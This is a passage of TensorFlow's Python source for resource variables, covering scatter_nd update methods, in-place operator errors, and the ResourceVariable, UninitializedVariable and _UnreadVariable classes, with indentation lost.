batch_dim:]`
where
`sparse_delta.updates.shape[:num_prefix_dims]`
`== sparse_delta.indices.shape[:num_prefix_dims]`
`== var.shape[:num_prefix_dims]`
And the operation performed can be expressed as:
`var[i_1, ..., i_n,
sparse_delta.indices[i_1, ..., i_n, j]] = sparse_delta.updates[
i_1, ..., i_n, j]`
When sparse_delta.indices is a 1D tensor, this operation is equivalent to
`scatter_update`.
To avoid this operation one can looping over the first `ndims` of the
variable and using `scatter_update` on the subtensors that result of slicing
the first dimension. This is a valid option for `ndims = 1`, but less
efficient than this implementation.
Args:
sparse_delta: `tf.IndexedSlices` to be assigned to this variable.
use_locking: If `True`, use locking during the operation.
name: the name of the operation.
Returns:
The updated variable.
Raises:
TypeError: if `sparse_delta` is not an `IndexedSlices`.
"""
if not isinstance(sparse_delta, indexed_slices.IndexedSlices):
raise TypeError(f"Argument `sparse_delta` must be a "
f"`tf.IndexedSlices`. Received arg: {sparse_delta}")
return self._lazy_read(
state_ops.batch_scatter_update(
self,
sparse_delta.indices,
sparse_delta.values,
use_locking=use_locking,
name=name))
def scatter_nd_sub(self, indices, updates, name=None):
"""Applies sparse subtraction to individual values or slices in a Variable.
`ref` is a `Tensor` with rank `P` and `indices` is a `Tensor` of rank `Q`.
`indices` must be integer tensor, containing indices into `ref`.
It must be shape `[d_0, ..., d_{Q-2}, K]` where `0 < K <= P`.
The innermost dimension of `indices` (with length `K`) corresponds to
indices into elements (if `K = P`) or slices (if `K < P`) along the `K`th
dimension of `ref`.
`updates` is `Tensor` of rank `Q-1+P-K` with shape:
```
[d_0, ..., d_{Q-2}, ref.shape[K], ..., ref.shape[P-1]].
```
For example, say we want to add 4 scattered elements to a rank-1 tensor to
8 elements. In Python, that update would look like this:
```python
ref = tf.Variable([1, 2, 3, 4, 5, 6, 7, 8])
indices = tf.constant([[4], [3], [1] ,[7]])
updates = tf.constant([9, 10, 11, 12])
op = ref.scatter_nd_sub(indices, updates)
with tf.compat.v1.Session() as sess:
print sess.run(op)
```
The resulting update to ref would look like this:
[1, -9, 3, -6, -6, 6, 7, -4]
See `tf.scatter_nd` for more details about how to make updates to
slices.
Args:
indices: The indices to be used in the operation.
updates: The values to be used in the operation.
name: the name of the operation.
Returns:
The updated variable.
"""
return self._lazy_read(
gen_state_ops.resource_scatter_nd_sub(
self.handle,
indices,
ops.convert_to_tensor(updates, self.dtype),
name=name))
def scatter_nd_add(self, indices, updates, name=None):
"""Applies sparse addition to individual values or slices in a Variable.
`ref` is a `Tensor` with rank `P` and `indices` is a `Tensor` of rank `Q`.
`indices` must be integer tensor, containing indices into `ref`.
It must be shape `[d_0, ..., d_{Q-2}, K]` where `0 < K <= P`.
The innermost dimension of `indices` (with length `K`) corresponds to
indices into elements (if `K = P`) or slices (if `K < P`) along the `K`th
dimension of `ref`.
`updates` is `Tensor` of rank `Q-1+P-K` with shape:
```
[d_0, ..., d_{Q-2}, ref.shape[K], ..., ref.shape[P-1]].
```
For example, say we want to add 4 scattered elements to a rank-1 tensor to
8 elements. In Python, that update would look like this:
```python
ref = tf.Variable([1, 2, 3, 4, 5, 6, 7, 8])
indices = tf.constant([[4], [3], [1] ,[7]])
updates = tf.constant([9, 10, 11, 12])
add = ref.scatter_nd_add(indices, updates)
with tf.compat.v1.Session() as sess:
print sess.run(add)
```
The resulting update to ref would look like this:
[1, 13, 3, 14, 14, 6, 7, 20]
See `tf.scatter_nd` for more details about how to make updates to
slices.
Args:
indices: The indices to be used in the operation.
updates: The values to be used in the operation.
name: the name of the operation.
Returns:
The updated variable.
"""
return self._lazy_read(
gen_state_ops.resource_scatter_nd_add(
self.handle,
indices,
ops.convert_to_tensor(updates, self.dtype),
name=name))
def scatter_nd_update(self, indices, updates, name=None):
"""Applies sparse assignment to individual values or slices in a Variable.
`ref` is a `Tensor` with rank `P` and `indices` is a `Tensor` of rank `Q`.
`indices` must be integer tensor, containing indices into `ref`.
It must be shape `[d_0, ..., d_{Q-2}, K]` where `0 < K <= P`.
The innermost dimension of `indices` (with length `K`) corresponds to
indices into elements (if `K = P`) or slices (if `K < P`) along the `K`th
dimension of `ref`.
`updates` is `Tensor` of rank `Q-1+P-K` with shape:
```
[d_0, ..., d_{Q-2}, ref.shape[K], ..., ref.shape[P-1]].
```
For example, say we want to add 4 scattered elements to a rank-1 tensor to
8 elements. In Python, that update would look like this:
```python
ref = tf.Variable([1, 2, 3, 4, 5, 6, 7, 8])
indices = tf.constant([[4], [3], [1] ,[7]])
updates = tf.constant([9, 10, 11, 12])
op = ref.scatter_nd_update(indices, updates)
with tf.compat.v1.Session() as sess:
print sess.run(op)
```
The resulting update to ref would look like this:
[1, 11, 3, 10, 9, 6, 7, 12]
See `tf.scatter_nd` for more details about how to make updates to
slices.
Args:
indices: The indices to be used in the operation.
updates: The values to be used in the operation.
name: the name of the operation.
Returns:
The updated variable.
"""
return self._lazy_read(
gen_state_ops.resource_scatter_nd_update(
self.handle,
indices,
ops.convert_to_tensor(updates, self.dtype),
name=name))
def scatter_nd_max(self, indices, updates, name=None):
"""Updates this variable with the max of `tf.IndexedSlices` and itself.
`ref` is a `Tensor` with rank `P` and `indices` is a `Tensor` of rank `Q`.
`indices` must be integer tensor, containing indices into `ref`.
It must be shape `[d_0, ..., d_{Q-2}, K]` where `0 < K <= P`.
The innermost dimension of `indices` (with length `K`) corresponds to
indices into elements (if `K = P`) or slices (if `K < P`) along the `K`th
dimension of `ref`.
`updates` is `Tensor` of rank `Q-1+P-K` with shape:
```
[d_0, ..., d_{Q-2}, ref.shape[K], ..., ref.shape[P-1]].
```
See `tf.scatter_nd` for more details about how to make updates to
slices.
Args:
indices: The indices to be used in the operation.
updates: The values to be used in the operation.
name: the name of the operation.
Returns:
The updated variable.
"""
return self._lazy_read(
gen_state_ops.resource_scatter_nd_max(
self.handle,
indices,
ops.convert_to_tensor(updates, self.dtype),
name=name))
def scatter_nd_min(self, indices, updates, name=None):
"""Updates this variable with the min of `tf.IndexedSlices` and itself.
`ref` is a `Tensor` with rank `P` and `indices` is a `Tensor` of rank `Q`.
`indices` must be integer tensor, containing indices into `ref`.
It must be shape `[d_0, ..., d_{Q-2}, K]` where `0 < K <= P`.
The innermost dimension of `indices` (with length `K`) corresponds to
indices into elements (if `K = P`) or slices (if `K < P`) along the `K`th
dimension of `ref`.
`updates` is `Tensor` of rank `Q-1+P-K` with shape:
```
[d_0, ..., d_{Q-2}, ref.shape[K], ..., ref.shape[P-1]].
```
See `tf.scatter_nd` for more details about how to make updates to
slices.
Args:
indices: The indices to be used in the operation.
updates: The values to be used in the operation.
name: the name of the operation.
Returns:
The updated variable.
"""
return self._lazy_read(
gen_state_ops.resource_scatter_nd_min(
self.handle,
indices,
ops.convert_to_tensor(updates, self.dtype),
name=name))
def _write_object_proto(self, proto, options):
"""Writes additional information of the variable into the SavedObject proto.
Subclasses of ResourceVariables could choose to override this method to
customize extra information to provide when saving a SavedModel.
Ideally, this should contain the logic in
write_object_proto_for_resource_variable but `DistributedValue` is an
outlier at the momemnt. Once `DistributedValue` becomes a proper
ResourceVariable, we should remove the helper method below.
Args:
proto: `SavedObject` proto to update.
options: A `SaveOption` instance that configures save behavior.
"""
write_object_proto_for_resource_variable(self, proto, options)
def _strided_slice_assign(self, begin, end, strides, value, name, begin_mask,
end_mask, ellipsis_mask, new_axis_mask,
shrink_axis_mask):
with _handle_graph(self.handle), self._assign_dependencies():
return self._lazy_read(
gen_array_ops.resource_strided_slice_assign(
ref=self.handle,
begin=begin,
end=end,
strides=strides,
value=ops.convert_to_tensor(value, dtype=self.dtype),
name=name,
begin_mask=begin_mask,
end_mask=end_mask,
ellipsis_mask=ellipsis_mask,
new_axis_mask=new_axis_mask,
shrink_axis_mask=shrink_axis_mask))
def __complex__(self):
return complex(self.value().numpy())
def __int__(self):
return int(self.value().numpy())
def __long__(self):
return long(self.value().numpy())
def __float__(self):
return float(self.value().numpy())
def _dense_var_to_tensor(self, dtype=None, name=None, as_ref=False):
del name
if dtype is not None and not dtype.is_compatible_with(self.dtype):
raise ValueError(
f"Incompatible type conversion requested to type {dtype.name} for "
f"`tf.Variable of type {self.dtype.name}. (Variable: {self})")
if as_ref:
return self.read_value().op.inputs[0]
else:
return self.value()
def __iadd__(self, unused_other):
raise RuntimeError("`variable += value` with `tf.Variable`s is not "
"supported. Use `variable.assign_add(value)` to modify "
"the variable, or `out = variable + value` if you "
"need to get a new output Tensor.")
def __isub__(self, unused_other):
raise RuntimeError("`variable -= value` with `tf.Variable`s is not "
"supported. Use `variable.assign_sub(value)` to modify "
"the variable, or `out = variable * value` if you "
"need to get a new output Tensor.")
def __imul__(self, unused_other):
raise RuntimeError("`var *= value` with `tf.Variable`s is not "
"supported. Use `var.assign(var * value)` to modify "
"the variable, or `out = var * value` if you "
"need to get a new output Tensor.")
def __idiv__(self, unused_other):
raise RuntimeError("`var /= value` with `tf.Variable`s is not "
"supported. Use `var.assign(var / value)` to modify "
"the variable, or `out = var / value` if you "
"need to get a new output Tensor.")
def __itruediv__(self, unused_other):
raise RuntimeError("`var /= value` with `tf.Variable`s is not "
"supported. Use `var.assign(var / value)` to modify "
"the variable, or `out = var / value` if you "
"need to get a new output Tensor.")
def __irealdiv__(self, unused_other):
raise RuntimeError("`var /= value` with `tf.Variable`s is not "
"supported. Use `var.assign(var / value)` to modify "
"the variable, or `out = var / value` if you "
"need to get a new output Tensor.")
def __ipow__(self, unused_other):
raise RuntimeError("`var **= value` with `tf.Variable`s is not "
"supported. Use `var.assign(var ** value)` to modify "
"the variable, or `out = var ** value` if you "
"need to get a new output Tensor.")
class ResourceVariable(BaseResourceVariable):
"""Variable based on resource handles.
See the [Variables How To](https://tensorflow.org/guide/variables)
for a high level overview.
A `ResourceVariable` allows you to maintain state across subsequent calls to
session.run.
The `ResourceVariable` constructor requires an initial value for the variable,
which can be a `Tensor` of any type and shape. The initial value defines the
type and shape of the variable. After construction, the type and shape of
the variable are fixed. The value can be changed using one of the assign
methods.
Just like any `Tensor`, variables created with
`tf.Variable(use_resource=True)` can be used as inputs for other Ops in the
graph. Additionally, all the operators overloaded for the `Tensor` class are
carried over to variables, so you can also add nodes to the graph by just
doing arithmetic on variables.
Unlike ref-based variable, a ResourceVariable has well-defined semantics. Each
usage of a ResourceVariable in a TensorFlow graph adds a read_value operation
to the graph. The Tensors returned by a read_value operation are guaranteed to
see all modifications to the value of the variable which happen in any
operation on which the read_value depends on (either directly, indirectly, or
via a control dependency) and guaranteed to not see any modification to the
value of the variable from operations that depend on the read_value operation.
Updates from operations that have no dependency relationship to the read_value
operation might or might not be visible to read_value.
For example, if there is more than one assignment to a ResourceVariable in
a single session.run call there is a well-defined value for each operation
which uses the variable's value if the assignments and the read are connected
by edges in the graph. Consider the following example, in which two writes
can cause tf.Variable and tf.ResourceVariable to behave differently:
```python
a = tf.Variable(1.0, use_resource=True)
a.initializer.run()
assign = a.assign(2.0)
with tf.control_dependencies([assign]):
b = a.read_value()
with tf.control_dependencies([b]):
other_assign = a.assign(3.0)
with tf.control_dependencies([other_assign]):
# Will print 2.0 because the value was read before other_assign ran. If
# `a` was a tf.Variable instead, 2.0 or 3.0 could be printed.
tf.compat.v1.Print(b, [b]).eval()
```
"""
def __init__(
self, # pylint: disable=super-init-not-called
initial_value=None,
trainable=None,
collections=None,
validate_shape=True, # pylint: disable=unused-argument
caching_device=None,
name=None,
dtype=None,
variable_def=None,
import_scope=None,
constraint=None,
distribute_strategy=None,
synchronization=None,
aggregation=None,
shape=None):
"""Creates a variable.
Args:
initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. Can also be a callable with
no argument that returns the initial value when called. (Note that
initializer functions from init_ops.py must first be bound to a shape
before being used here.)
trainable: If `True`, the default, also adds the variable to the graph
collection `GraphKeys.TRAINABLE_VARIABLES`. This collection is used as
the default list of variables to use by the `Optimizer` classes.
Defaults to `True`, unless `synchronization` is set to `ON_READ`, in
which case it defaults to `False`.
collections: List of graph collections keys. The new variable is added to
these collections. Defaults to `[GraphKeys.GLOBAL_VARIABLES]`.
validate_shape: Ignored. Provided for compatibility with tf.Variable.
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
dtype: If set, initial_value will be converted to the given type. If None,
either the datatype will be kept (if initial_value is a Tensor) or
float32 will be used (if it is a Python object convertible to a Tensor).
variable_def: `VariableDef` protocol buffer. If not None, recreates the
`ResourceVariable` object with its contents. `variable_def` and other
arguments (except for import_scope) are mutually exclusive.
import_scope: Optional `string`. Name scope to add to the
ResourceVariable. Only used when `variable_def` is provided.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
distribute_strategy: The tf.distribute.Strategy this variable is being
created inside of.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses when to
synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
shape: (optional) The shape of this variable. If None, the shape of
`initial_value` will be used. When setting this argument to
`tf.TensorShape(None)` (representing an unspecified shape), the variable
can be assigned with values of different shapes.
Raises:
ValueError: If the initial value is not specified, or does not have a
shape and `validate_shape` is `True`.
@compatibility(eager)
When Eager Execution is enabled, the default for the `collections` argument
is `None`, which signifies that this `Variable` will not be added to any
collections.
@end_compatibility
"""
if variable_def:
if initial_value is not None:
raise ValueError(f"The variable_def and initial_value args to "
f"`tf.Variable` are mutually exclusive, but got both: "
f"variable_def={variable_def},\n"
f"initial_value={initial_value}")
if context.executing_eagerly():
raise ValueError(f"Creating a `tf.Variable` with a `variable_def` arg "
f"is not supported when eager execution is enabled. "
f"Got: variable_def={variable_def}")
self._init_from_proto(variable_def, import_scope=import_scope)
else:
self._init_from_args(
initial_value=initial_value,
trainable=trainable,
collections=collections,
caching_device=caching_device,
name=name,
dtype=dtype,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation,
shape=shape,
distribute_strategy=distribute_strategy)
def _init_from_args(self,
initial_value=None,
trainable=None,
collections=None,
caching_device=None,
name=None,
dtype=None,
constraint=None,
synchronization=None,
aggregation=None,
distribute_strategy=None,
shape=None):
"""Creates a variable.
Args:
initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called.
(Note that initializer functions from init_ops.py must first be bound to
a shape before being used here.)
trainable: If `True`, the default, also adds the variable to the graph
collection `GraphKeys.TRAINABLE_VARIABLES`. This collection is used as
the default list of variables to use by the `Optimizer` classes.
Defaults to `True`, unless `synchronization` is set to `ON_READ`, in
which case it defaults to `False`.
collections: List of graph collections keys. The new variable is added to
these collections. Defaults to `[GraphKeys.GLOBAL_VARIABLES]`.
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
dtype: If set, initial_value will be converted to the given type. If None,
either the datatype will be kept (if initial_value is a Tensor) or
float32 will be used (if it is a Python object convertible to a Tensor).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses when to
synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
distribute_strategy: DistributionStrategy under which this variable was
created.
shape: (optional) The shape of this variable. If None, the shape of
`initial_value` will be used. When setting this argument to
`tf.TensorShape(None)` (representing an unspecified shape), the variable
can be assigned with values of different shapes.
Raises:
ValueError: If the initial value is not specified, or does not have a
shape and `validate_shape` is `True`.
@compatibility(eager)
When Eager Execution is enabled, variables are never added to collections.
It is not implicitly added to the `GLOBAL_VARIABLES` or
`TRAINABLE_VARIABLES` collections, and the `collections` argument is
ignored.
@end_compatibility
"""
synchronization, aggregation, trainable = (
variables.validate_synchronization_aggregation_trainable(
synchronization, aggregation, trainable, name))
if initial_value is None:
raise ValueError("The `initial_value` arg to `tf.Variable` must "
"be specified except when you are not providing a "
"`variable_def`. You provided neither.")
init_from_fn = callable(initial_value)
if isinstance(initial_value, ops.Tensor) and hasattr(
initial_value, "graph") and initial_value.graph.building_function:
raise ValueError(f"Argument `initial_value` ({initial_value}) could not "
"be lifted out of a `tf.function`. "
"(Tried to create variable with name='{name}'). "
"To avoid this error, when constructing `tf.Variable`s "
"inside of `tf.function` you can create the "
"`initial_value` tensor in a "
"`tf.init_scope` or pass a callable `initial_value` "
"(e.g., `tf.Variable(lambda : "
"tf.truncated_normal([10, 40]))`). "
"Please file a feature request if this "
"restriction inconveniences you.")
if collections is None:
collections = [ops.GraphKeys.GLOBAL_VARIABLES]
if not isinstance(collections, (list, tuple, set)):
raise ValueError(
f"collections argument to Variable constructor must be a list, "
f"tuple, or set. Got {collections} of type {type(collections)}")
if constraint is not None and not callable(constraint):
raise ValueError(f"Argument `constraint` must be None or a callable. "
f"a callable. Got a {type(constraint)}: {constraint}")
if trainable and ops.GraphKeys.TRAINABLE_VARIABLES not in collections:
collections = list(collections) + [ops.GraphKeys.TRAINABLE_VARIABLES]
with ops.init_scope():
self._in_graph_mode = not context.executing_eagerly()
with ops.name_scope(
name,
"Variable", [] if init_from_fn else [initial_value],
skip_on_eager=False) as name:
# pylint: disable=protected-access
handle_name = ops.name_from_scope_name(name)
if self._in_graph_mode:
shared_name = handle_name
unique_id = shared_name
else:
# When in eager mode use a uid for the shared_name, to prevent
# accidental sharing.
unique_id = "%s_%d" % (handle_name, ops.uid())
shared_name = None # Never shared
# Use attr_scope and device(None) to simulate the behavior of
# colocate_with when the variable we want to colocate with doesn't
# yet exist.
device_context_manager = (
ops.device if self._in_graph_mode else ops.NullContextmanager)
attr = attr_value_pb2.AttrValue(
list=attr_value_pb2.AttrValue.ListValue(
s=[compat.as_bytes("loc:@%s" % handle_name)]))
with ops.get_default_graph()._attr_scope({"_class": attr}):
with ops.name_scope("Initializer"), device_context_manager(None):
if init_from_fn:
initial_value = initial_value()
if isinstance(initial_value, trackable.CheckpointInitialValue):
self._maybe_initialize_trackable()
self._update_uid = initial_value.checkpoint_position.restore_uid
initial_value = initial_value.wrapped_value
initial_value = ops.convert_to_tensor(initial_value,
name="initial_value",
dtype=dtype)
if shape is not None:
if not initial_value.shape.is_compatible_with(shape):
raise ValueError(
f"In this `tf.Variable` creation, the initial value's shape "
f"({initial_value.shape}) is not compatible with "
f"the explicitly supplied `shape` argument ({shape}).")
else:
shape = initial_value.shape
handle = eager_safe_variable_handle(
initial_value=initial_value,
shape=shape,
shared_name=shared_name,
name=name,
graph_mode=self._in_graph_mode)
handle._parent_trackable = weakref.ref(self)
# pylint: disable=protected-access
if (self._in_graph_mode and initial_value is not None and
initial_value.op._get_control_flow_context() is not None):
raise ValueError(
f"The `initial_value` passed to `tf.Variable` {name} is from "
f"inside a control-flow construct, such as a loop or "
f"conditional. When creating a "
f"`tf.Variable` inside a loop or conditional, use a lambda as "
f"the `initial_value`. Got: initial_value=({initial_value})")
# pylint: enable=protected-access
dtype = initial_value.dtype.base_dtype
if self._in_graph_mode:
with ops.name_scope("IsInitialized"):
is_initialized_op = (
gen_resource_variable_ops.var_is_initialized_op(handle))
if initial_value is not None:
# pylint: disable=g-backslash-continuation
with ops.name_scope("Assign") as n, \
ops.colocate_with(None, ignore_existing=True), \
ops.device(handle.device):
# pylint: disable=protected-access
initializer_op = (
gen_resource_variable_ops.assign_variable_op(
handle,
variables._try_guard_against_uninitialized_dependencies(
name, initial_value),
name=n))
# pylint: enable=protected-access
# pylint: enable=g-backslash-continuation
with ops.name_scope("Read"):
# Manually assign reads to the handle's device to avoid log
# messages.
with ops.device(handle.device):
value = gen_resource_variable_ops.read_variable_op(handle, dtype)
_maybe_set_handle_data(dtype, handle, value)
graph_element = value
if caching_device is not None:
# Variables may be created in a tf.device() or ops.colocate_with()
# context. At the same time, users would expect caching device to
# be independent of this context, and/or would not expect the
# current device context to be merged with the caching device
# spec. Therefore we reset the colocation stack before creating
# the cached value. Note that resetting the colocation stack will
# also reset the device stack.
with ops.colocate_with(None, ignore_existing=True):
with ops.device(caching_device):
cached_value = array_ops.identity(value)
else:
cached_value = None
else:
gen_resource_variable_ops.assign_variable_op(handle, initial_value)
is_initialized_op = None
initializer_op = None
graph_element = None
if caching_device:
with ops.device(caching_device):
cached_value = gen_resource_variable_ops.read_variable_op(
handle, dtype)
_maybe_set_handle_data(dtype, handle, cached_value)
else:
cached_value = None
if cached_value is not None:
# Store the variable object so that the original variable can be
# accessed to generate functions that are compatible with SavedModel.
cached_value._cached_variable = weakref.ref(self) # pylint: disable=protected-access
if not context.executing_eagerly():
# Eager variables are only added to collections if they are part of an
# eager variable store (otherwise in an interactive session they would
# hog memory and cause OOM). This is done in ops/variable_scope.py.
ops.add_to_collections(collections, self)
elif ops.GraphKeys.GLOBAL_STEP in collections:
ops.add_to_collections(ops.GraphKeys.GLOBAL_STEP, self)
initial_value = initial_value if self._in_graph_mode else None
super(ResourceVariable, self).__init__(
trainable=trainable,
shape=shape,
dtype=dtype,
handle=handle,
synchronization=synchronization,
constraint=constraint,
aggregation=aggregation,
distribute_strategy=distribute_strategy,
name=name,
unique_id=unique_id,
handle_name=handle_name,
graph_element=graph_element,
initial_value=initial_value,
initializer_op=initializer_op,
is_initialized_op=is_initialized_op,
cached_value=cached_value,
caching_device=caching_device)
def _init_from_proto(self, variable_def, import_scope=None):
"""Initializes from `VariableDef` proto."""
# Note that init_from_proto is currently not supported in Eager mode.
assert not context.executing_eagerly()
self._in_graph_mode = True
assert isinstance(variable_def, variable_pb2.VariableDef)
if not variable_def.is_resource:
raise ValueError(f"The `variable_def` you passed to `tf.Variable` is "
f"Trying to restore a TF 1.x Reference Variable "
f"as a TF 2.x ResourceVariable. This is unsupported. "
f"Got variable_def={variable_def}")
# Create from variable_def.
g = ops.get_default_graph()
self._handle = g.as_graph_element(
ops.prepend_name_scope(
variable_def.variable_name, import_scope=import_scope))
self._shape = tensor_shape.TensorShape(self._handle.op.get_attr("shape"))
self._handle_name = self._handle.name
self._unique_id = self._handle_name
self._initializer_op = g.as_graph_element(
ops.prepend_name_scope(
variable_def.initializer_name, import_scope=import_scope))
# Check whether initial_value_name exists for backwards compatibility.
if (hasattr(variable_def, "initial_value_name") and
variable_def.initial_value_name):
self._initial_value = g.as_graph_element(
ops.prepend_name_scope(
variable_def.initial_value_name, import_scope=import_scope))
else:
self._initial_value = None
synchronization, aggregation, trainable = (
variables.validate_synchronization_aggregation_trainable(
variable_def.synchronization, variable_def.aggregation,
variable_def.trainable, variable_def.variable_name))
self._synchronization = synchronization
self._aggregation = aggregation
self._trainable = trainable
if variable_def.snapshot_name:
snapshot = g.as_graph_element(
ops.prepend_name_scope(
variable_def.snapshot_name, import_scope=import_scope))
if snapshot.op.type != "ReadVariableOp":
self._cached_value = snapshot
else:
self._cached_value = None
while snapshot.op.type != "ReadVariableOp":
snapshot = snapshot.op.inputs[0]
self._graph_element = snapshot
else:
self._cached_value = None
# Legacy case for protos without the snapshot name; assume it's the
# following.
self._graph_element = g.get_tensor_by_name(self._handle.op.name +
"/Read/ReadVariableOp:0")
if variable_def.HasField("save_slice_info_def"):
self._save_slice_info = variables.Variable.SaveSliceInfo(
save_slice_info_def=variable_def.save_slice_info_def,
import_scope=import_scope)
else:
self._save_slice_info = None
self._caching_device = None
self._dtype = dtypes.as_dtype(self._handle.op.get_attr("dtype"))
self._constraint = None
class UninitializedVariable(BaseResourceVariable):
"""A variable with no initializer."""
def __init__( # pylint: disable=super-init-not-called
self,
trainable=None,
caching_device=None,
name=None,
shape=None,
dtype=None,
constraint=None,
synchronization=None,
aggregation=None,
extra_handle_data=None,
distribute_strategy=None,
**unused_kwargs):
"""Creates the variable handle.
Args:
trainable: If `True`, GradientTapes automatically watch uses of this
Variable.
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
shape: The variable's shape.
dtype: The variable's dtype.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses when to
synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
extra_handle_data: Optional, another resource handle or Tensor with handle
data to merge with `shape` and `dtype`.
distribute_strategy: The tf.distribute.Strategy this variable is being
created inside of.
"""
with ops.init_scope():
# Here we are detecting eagerness within an init_scope, so this will only
# be true when we are running in TF1 graph mode.
self._in_graph_mode = not context.executing_eagerly()
with ops.name_scope(name, "Variable", skip_on_eager=False) as name:
handle_name = ops.name_from_scope_name(name)
if self._in_graph_mode:
shared_name = handle_name
unique_id = shared_name
else:
unique_id = "%s_%d" % (handle_name, ops.uid())
shared_name = None # Never shared
handle = _variable_handle_from_shape_and_dtype(
shape=shape,
dtype=dtype,
shared_name=shared_name,
name=name,
graph_mode=self._in_graph_mode,
initial_value=extra_handle_data)
handle._parent_trackable = weakref.ref(self)
if self._in_graph_mode:
# We only need to add the read_variable_op in TF1.
with ops.name_scope("Read"):
# Manually assign reads to the handle's device to avoid log
# messages.
with ops.device(handle.device):
value = gen_resource_variable_ops.read_variable_op(handle, dtype)
_maybe_set_handle_data(dtype, handle, value)
graph_element = value
ops.add_to_collection(ops.GraphKeys.GLOBAL_VARIABLES, self)
# Do *not* add to TRAINABLE_VARIABLES here, even if self._trainable,
# because retraining or frozen use of imported SavedModels is
# controlled at higher levels of model building.
else:
graph_element = None
super(UninitializedVariable, self).__init__(
distribute_strategy=distribute_strategy,
shape=shape,
dtype=dtype,
unique_id=unique_id,
handle_name=handle_name,
constraint=constraint,
handle=handle,
graph_element=graph_element,
trainable=trainable,
synchronization=synchronization,
aggregation=aggregation,
in_graph_mode=self._in_graph_mode)
_pywrap_utils.RegisterType("ResourceVariable", ResourceVariable)
math_ops._resource_variable_type = ResourceVariable # pylint: disable=protected-access
def _dense_var_to_tensor(var, dtype=None, name=None, as_ref=False):
return var._dense_var_to_tensor(dtype=dtype, name=name, as_ref=as_ref) # pylint: disable=protected-access
# Register a conversion function which reads the value of the variable,
# allowing instances of the class to be used as tensors.
ops.register_tensor_conversion_function(BaseResourceVariable,
_dense_var_to_tensor)
class _UnreadVariable(BaseResourceVariable):
"""Represents a future for a read of a variable.
Pretends to be the tensor if anyone looks.
"""
def __init__(self, handle, dtype, shape, in_graph_mode, parent_op,
unique_id):
if isinstance(handle, ops.EagerTensor):
handle_name = ""
else:
handle_name = handle.name
# Only create a graph_element if we're in session.run-land as only
# session.run requires a preexisting tensor to evaluate. Otherwise we can
# avoid accidentally reading the variable.
if context.executing_eagerly() or ops.inside_function():
graph_element = None
else:
with ops.control_dependencies([parent_op]):
graph_element = gen_resource_variable_ops.read_variable_op(
handle, dtype)
_maybe_set_handle_data(dtype, handle, graph_element)
super(_UnreadVariable, self).__init__(
handle=handle,
shape=shape,
handle_name=handle_name,
unique_id=unique_id,
dtype=dtype,
graph_element=graph_element)
self._parent_op = parent_op
@property
def name(self):
if self._in_graph_mode:
return self._parent_op.name
else:
return "UnreadVariable"
def value(self):
return self._read_variable_op()
def read_value(self):
return self._read_variable_op()
def _read_variable_op(self):
with ops.control_dependencies([self._parent_op]):
result = gen_resource_variable_ops.read_variable_op(
self._handle, self._dtype)
_maybe_set_handle_data(self._dtype, self._handle, result)
return result
def assign_sub(self, delta, use_locking=None, name=None, read_value=True):
with ops.control_dependencies([self._parent_op]):
return super(_UnreadVariable, self).assign_sub(delta, use_locking, name,
read_value)
def assign_add(self, delta, use_locking=None, name=None, read_value=True):
with ops.control_dependencies([self._parent_op]):
return super(_UnreadVariable, self).assign_add(delta, use_locking, name,
read_value)
def assign(self, value, use_locking=None, name=None, read_value=True):
with ops.control_dependencies([self._parent_op]):
return super(_UnreadVariable, self).assign(value, use_locking, name,
read_value)
def scatter_sub(self, sparse_delta, use_locking=False, name=None):
with ops.control_dependencies([self._parent_op]):
return super(_UnreadVariable, self).scatter_sub(sparse_delta, use_locking,
name)
def scatter_add(self, sparse_delta, use_locking=False, name=None):
with ops.control_dependencies([self._parent_op]):
return super(_UnreadVariable, self).scatter_add(sparse_delta, use_locking,
name)
def scatter_max(self, sparse_delta, use_locking=False, name=None):
with ops.control_dependencies([self._parent_op]):
return super(_UnreadVariable, self).scatter_max(sparse_delta, use_locking,
name)
def scatter_min(self, sparse_delta, use_locking=False, name=None):
